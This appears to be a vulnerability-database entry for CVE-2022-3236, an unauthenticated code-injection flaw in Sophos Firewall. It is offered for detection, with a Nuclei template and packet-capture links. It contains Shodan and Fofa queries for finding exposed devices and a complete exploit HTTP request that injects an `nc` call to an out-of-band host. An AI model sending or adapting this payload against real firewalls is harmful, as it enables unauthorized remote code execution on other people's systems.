🔙 목록으로 돌아가기

CVE-2022-3236: Sophos Firewall <= 19.0 MR1 - Remote Code Execution

TitleSophos Firewall <= 19.0 MR1 - Remote Code Execution
Authordaffainfo
SeverityCritical
ImpactRemote attackers can execute arbitrary code on the system, potentially leading to full system compromise.
RemediationUpdate to the latest version of Sophos Firewall.
CVSS Score9.8
EPSS Score0.93105
CVE IDCVE-2022-3236
CWE IDCWE-94
Shodan Queryhttp.title:"Sophos"
Fofa Querytitle="sophos"
Tags cve cve2022 sophos firewall rce intrusive oast kev vkev

🔍 Vulnerability Description

Sophos Firewall version v19.0 MR1 and older is vulnerable to code injection in the User Portal and Webadmin, allowing a remote unauthenticated attacker to execute arbitrary code.

🌐 HTTP Request

POST /userportal/Controller HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15
Connection: close
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

mode=451&json=%7b%22username%22%3a%22admin%22%2c%22password%22%3a%22x%22%2c%22languageid%22%3a%221%22%2c%22browser%22%3a%22Firefox_91%22%2c%22_discriminator%22%3a%7b%22curvalue%22%3a%22%3b%60nc%20d6dtg49le0o6d75mr0og3e47rzo5orpom.oast.live%2080%60%22%7d%2c%22value%22%3a%22curvalue%22%7d&__RequestType=ajax&t=1710331582506

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3236.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-3236.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A